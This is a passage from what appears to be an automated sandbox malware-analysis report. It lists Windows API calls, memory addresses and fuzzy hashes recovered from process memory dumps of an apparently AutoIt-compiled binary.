                                                                                                                                          • Part of subcall function 00B2600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00B2604C
                                                                                                                                          • Part of subcall function 00B2600E: GetStockObject.GDI32(00000011), ref: 00B26060
                                                                                                                                          • Part of subcall function 00B2600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00B2606A
                                                                                                                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00BB4112
                                                                                                                                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00BB411F
                                                                                                                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00BB412A
                                                                                                                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00BB4139
                                                                                                                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00BB4145
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                        • String ID: Msctls_Progress32
                                                                                                                                        • API String ID: 1025951953-3636473452
                                                                                                                                        • Opcode ID: c05824723e68450d9134bcab8d33d19d825354100f1b737aa2ed824ba9762264
                                                                                                                                        • Instruction ID: 8390cd5e4fdde30d2aca1263cab9a27a56893596751c603e2bf7374bc46efb23
                                                                                                                                        • Opcode Fuzzy Hash: c05824723e68450d9134bcab8d33d19d825354100f1b737aa2ed824ba9762264
                                                                                                                                        • Instruction Fuzzy Hash: 411190B2150219BFEF119E64CC85EF77F9DEF08798F004111BA18A6050CBB29C21DBA4
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00B5D7A3: _free.LIBCMT ref: 00B5D7CC
                                                                                                                                        • _free.LIBCMT ref: 00B5D82D
                                                                                                                                          • Part of subcall function 00B529C8: HeapFree.KERNEL32(00000000,00000000,?,00B5D7D1,00000000,00000000,00000000,00000000,?,00B5D7F8,00000000,00000007,00000000,?,00B5DBF5,00000000), ref: 00B529DE
                                                                                                                                          • Part of subcall function 00B529C8: GetLastError.KERNEL32(00000000,?,00B5D7D1,00000000,00000000,00000000,00000000,?,00B5D7F8,00000000,00000007,00000000,?,00B5DBF5,00000000,00000000), ref: 00B529F0
                                                                                                                                        • _free.LIBCMT ref: 00B5D838
                                                                                                                                        • _free.LIBCMT ref: 00B5D843
                                                                                                                                        • _free.LIBCMT ref: 00B5D897
                                                                                                                                        • _free.LIBCMT ref: 00B5D8A2
                                                                                                                                        • _free.LIBCMT ref: 00B5D8AD
                                                                                                                                        • _free.LIBCMT ref: 00B5D8B8
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                        • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                                                                                                        • Instruction ID: 29402ad087638ce728cb7eee2516f8574db46f77bd0b8bf4310d230ff3345ff4
                                                                                                                                        • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                                                                                                        • Instruction Fuzzy Hash: 28118171541B04AAD531BFB0CC07FCB7BDCAF09702F4009E5BA99A6A92DA24B9094650
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00B8DA74
                                                                                                                                        • LoadStringW.USER32(00000000), ref: 00B8DA7B
                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00B8DA91
                                                                                                                                        • LoadStringW.USER32(00000000), ref: 00B8DA98
                                                                                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00B8DADC
                                                                                                                                        Strings
                                                                                                                                        • %s (%d) : ==> %s: %s %s, xrefs: 00B8DAB9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HandleLoadModuleString$Message
                                                                                                                                        • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                        • API String ID: 4072794657-3128320259
                                                                                                                                        • Opcode ID: 662fc3b047c52d0f2ae50464593111b872fc01856d43153aa4e0ed0a36fe7a17
                                                                                                                                        • Instruction ID: c3855d514cb6bb2fd2252b3c93d0051f0d9a46925db0af814d7db7cf436cc4d5
                                                                                                                                        • Opcode Fuzzy Hash: 662fc3b047c52d0f2ae50464593111b872fc01856d43153aa4e0ed0a36fe7a17
                                                                                                                                        • Instruction Fuzzy Hash: F6018BF29002087FE751E7A49D89EFB376CD708701F400596B706E3051EAB49D848F74
                                                                                                                                        APIs
                                                                                                                                        • InterlockedExchange.KERNEL32(0108DEB0,0108DEB0), ref: 00B9097B
                                                                                                                                        • EnterCriticalSection.KERNEL32(0108DE90,00000000), ref: 00B9098D
                                                                                                                                        • TerminateThread.KERNEL32(?,000001F6), ref: 00B9099B
                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000003E8), ref: 00B909A9
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00B909B8
                                                                                                                                        • InterlockedExchange.KERNEL32(0108DEB0,000001F6), ref: 00B909C8
                                                                                                                                        • LeaveCriticalSection.KERNEL32(0108DE90), ref: 00B909CF
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3495660284-0
                                                                                                                                        • Opcode ID: ff81f6f22996db380f98c3e61ee3230253e6e2f15b5fa9bb1e17fe83e906d95a
                                                                                                                                        • Instruction ID: f27c0f91d02d1dd5caef6a9914f43175428f19abd2c20012cbfa3d2716d5e23c
                                                                                                                                        • Opcode Fuzzy Hash: ff81f6f22996db380f98c3e61ee3230253e6e2f15b5fa9bb1e17fe83e906d95a
                                                                                                                                        • Instruction Fuzzy Hash: 93F03131442512BFDB459F94EE8CBD67F75FF01702F501126F101518A0CBB49865CF90
                                                                                                                                        APIs
                                                                                                                                        • GetClientRect.USER32(?,?), ref: 00B25D30
                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00B25D71
                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 00B25D99
                                                                                                                                        • GetClientRect.USER32(?,?), ref: 00B25ED7
                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00B25EF8
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Rect$Client$Window$Screen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1296646539-0
                                                                                                                                        • Opcode ID: a017d2edafb7efc8444c82ce1d9abb35b9dc7f32c4cbbada86ad88d9b4327d2d
                                                                                                                                        • Instruction ID: ef890d180651bb47c6e453f2a7da6f3c8e52cbcd08130b2de9b4dfaec842611a
                                                                                                                                        • Opcode Fuzzy Hash: a017d2edafb7efc8444c82ce1d9abb35b9dc7f32c4cbbada86ad88d9b4327d2d
                                                                                                                                        • Instruction Fuzzy Hash: CFB17734A00A4ADFDB24DFA9C4807EEB7F1FF58310F14855AE8AAD7250DB34AA51DB50
                                                                                                                                        APIs
                                                                                                                                        • __allrem.LIBCMT ref: 00B500BA
                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B500D6
                                                                                                                                        • __allrem.LIBCMT ref: 00B500ED
                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B5010B
                                                                                                                                        • __allrem.LIBCMT ref: 00B50122
                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B50140
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1992179935-0
                                                                                                                                        • Opcode ID: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                                                                                                                                        • Instruction ID: b8291c8499bb12b7b946eb2de05c4f2e86cd8702b08461674aba44173b377354
                                                                                                                                        • Opcode Fuzzy Hash: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                                                                                                                                        • Instruction Fuzzy Hash: EC810872A01B069BE720AF28CC41B6B73E8EF45325F2845FAF951D76C1E7B0DA089751
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00BA3149: select.WSOCK32(00000000,?,00000000,00000000,?,?,?,00000000,?,?,?,00BA101C,00000000,?,?,00000000), ref: 00BA3195
                                                                                                                                        • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00BA1DC0
                                                                                                                                        • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00BA1DE1
                                                                                                                                        • WSAGetLastError.WSOCK32 ref: 00BA1DF2
                                                                                                                                        • inet_ntoa.WSOCK32(?), ref: 00BA1E8C
                                                                                                                                        • htons.WSOCK32(?,?,?,?,?), ref: 00BA1EDB
                                                                                                                                        • _strlen.LIBCMT ref: 00BA1F35
                                                                                                                                          • Part of subcall function 00B839E8: _strlen.LIBCMT ref: 00B839F2
                                                                                                                                          • Part of subcall function 00B26D9E: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000002,?,?,?,?,00B3CF58,?,?,?), ref: 00B26DBA
                                                                                                                                          • Part of subcall function 00B26D9E: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,00B3CF58,?,?,?), ref: 00B26DED
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ByteCharMultiWide_strlen$ErrorLasthtonsinet_ntoaselect
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1923757996-0
                                                                                                                                        • Opcode ID: 0c7e70a177920c9eb14d5963a151251eb9ac6f4f7013a1cef6f2b759210f4928
                                                                                                                                        • Instruction ID: 8b7c18d2e7fa92c8718351ef91ecfc3a656ae9a991de5ae01e1b169e0c5b5454
                                                                                                                                        • Opcode Fuzzy Hash: 0c7e70a177920c9eb14d5963a151251eb9ac6f4f7013a1cef6f2b759210f4928
                                                                                                                                        • Instruction Fuzzy Hash: B7A1E131508350AFC324EF28C895F2A7BE5EF85318F54899CF45A5B2A2CB71ED46CB91
                                                                                                                                        APIs
                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00B482D9,00B482D9,?,?,?,00B5644F,00000001,00000001,8BE85006), ref: 00B56258
                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00B5644F,00000001,00000001,8BE85006,?,?,?), ref: 00B562DE
                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00B563D8
                                                                                                                                        • __freea.LIBCMT ref: 00B563E5
                                                                                                                                          • Part of subcall function 00B53820: RtlAllocateHeap.NTDLL(00000000,?,00BF1444,?,00B3FDF5,?,?,00B2A976,00000010,00BF1440,00B213FC,?,00B213C6,?,00B21129), ref: 00B53852
                                                                                                                                        • __freea.LIBCMT ref: 00B563EE
                                                                                                                                        • __freea.LIBCMT ref: 00B56413
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1414292761-0
                                                                                                                                        • Opcode ID: c8783e6f4c7c90df99b96f519c9b7a647f65a31f72350f6860d178b22a5bcd10
                                                                                                                                        • Instruction ID: 7a84f9aa4242f39e3bb8f3e5c9e6acbb47aa072b1d6033eb5c109a55a3674338
                                                                                                                                        • Opcode Fuzzy Hash: c8783e6f4c7c90df99b96f519c9b7a647f65a31f72350f6860d178b22a5bcd10
                                                                                                                                        • Instruction Fuzzy Hash: 2E51D072A00216ABEB258F68DC81FAF7BE9EB48751F5446E9FC05E7140EB34DC48C664
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00B29CB3: _wcslen.LIBCMT ref: 00B29CBD
                                                                                                                                          • Part of subcall function 00BAC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00BAB6AE,?,?), ref: 00BAC9B5
                                                                                                                                          • Part of subcall function 00BAC998: _wcslen.LIBCMT ref: 00BAC9F1
                                                                                                                                          • Part of subcall function 00BAC998: _wcslen.LIBCMT ref: 00BACA68
                                                                                                                                          • Part of subcall function 00BAC998: _wcslen.LIBCMT ref: 00BACA9E
                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BABCCA
                                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00BABD25
                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00BABD6A
                                                                                                                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00BABD99
                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00BABDF3
                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00BABDFF
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1120388591-0
                                                                                                                                        • Opcode ID: 60998de0e631ea739c7e303b3f31d31d329e12e5af2f783a859a4d98e798a307
                                                                                                                                        • Instruction ID: e039e63b93970a9312f40c6c12c95c2f40fc2a36216fec9fc200b5b147755415
                                                                                                                                        • Opcode Fuzzy Hash: 60998de0e631ea739c7e303b3f31d31d329e12e5af2f783a859a4d98e798a307
                                                                                                                                        • Instruction Fuzzy Hash: B6819271118241EFD714DF24C895E2ABBE5FF85308F1489ACF4A94B2A2DB31ED45CB92
                                                                                                                                        APIs
                                                                                                                                        • VariantInit.OLEAUT32(00000035), ref: 00B7F7B9
                                                                                                                                        • SysAllocString.OLEAUT32(00000001), ref: 00B7F860
                                                                                                                                        • VariantCopy.OLEAUT32(00B7FA64,00000000), ref: 00B7F889
                                                                                                                                        • VariantClear.OLEAUT32(00B7FA64), ref: 00B7F8AD
                                                                                                                                        • VariantCopy.OLEAUT32(00B7FA64,00000000), ref: 00B7F8B1
                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00B7F8BB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Variant$ClearCopy$AllocInitString
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3859894641-0
                                                                                                                                        • Opcode ID: 0d69e29d694c72ae2e4a175dd07f201dd50e7bbffa1e7e86f2b3b594f4358a9a
                                                                                                                                        • Instruction ID: b3c2bc6b01e6e5298daf02e452b9d3c732d1d855c478708ba901281eb2525839
                                                                                                                                        • Opcode Fuzzy Hash: 0d69e29d694c72ae2e4a175dd07f201dd50e7bbffa1e7e86f2b3b594f4358a9a
                                                                                                                                        • Instruction Fuzzy Hash: 5051A331514312AACF24AB65D895B79B3E4EF45310F24D4E6E919EF291DB70CC40C7AA
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00B27620: _wcslen.LIBCMT ref: 00B27625
                                                                                                                                          • Part of subcall function 00B26B57: _wcslen.LIBCMT ref: 00B26B6A
                                                                                                                                        • GetOpenFileNameW.COMDLG32(00000058), ref: 00B994E5
                                                                                                                                        • _wcslen.LIBCMT ref: 00B99506
                                                                                                                                        • _wcslen.LIBCMT ref: 00B9952D
                                                                                                                                        • GetSaveFileNameW.COMDLG32(00000058), ref: 00B99585
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _wcslen$FileName$OpenSave
                                                                                                                                        • String ID: X
                                                                                                                                        • API String ID: 83654149-3081909835
                                                                                                                                        • Opcode ID: ab4dc65591280be2d4c313c6a7b4f840f394135c0940a96864cb977151070ec1
                                                                                                                                        • Instruction ID: 0624303bcad7f7911b5a9409945b3546f20bef8117002052151c1d0dd1bc58ff
                                                                                                                                        • Opcode Fuzzy Hash: ab4dc65591280be2d4c313c6a7b4f840f394135c0940a96864cb977151070ec1
                                                                                                                                        • Instruction Fuzzy Hash: B1E1BF315083509FDB64DF28D881A6AB7E4FF94310F0489BDF8899B2A2DB31DD05CB92
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00B39BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00B39BB2
                                                                                                                                        • BeginPaint.USER32(?,?,?), ref: 00B39241
                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00B392A5
                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 00B392C2
                                                                                                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00B392D3
                                                                                                                                        • EndPaint.USER32(?,?,?,?,?), ref: 00B39321
                                                                                                                                        • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00B771EA
                                                                                                                                          • Part of subcall function 00B39339: BeginPath.GDI32(00000000), ref: 00B39357
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3050599898-0
                                                                                                                                        • Opcode ID: 918b1957f6d844a0c64cc90806e69be7c24cc29222536ad23e6f29442657e0b1
                                                                                                                                        • Instruction ID: 30b3fff88eb1ab87951e3dd019063396b8b0a8594bdf1eba84fe4630eeb3d941
                                                                                                                                        • Opcode Fuzzy Hash: 918b1957f6d844a0c64cc90806e69be7c24cc29222536ad23e6f29442657e0b1
                                                                                                                                        • Instruction Fuzzy Hash: 7A41AD70108200EFD711DF29CC84FBA7BE8EF55320F244AA9F9A5972E1CBB19845DB61
                                                                                                                                        APIs
                                                                                                                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 00B9080C
                                                                                                                                        • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00B90847
                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 00B90863
                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 00B908DC
                                                                                                                                        • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00B908F3
                                                                                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 00B90921
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
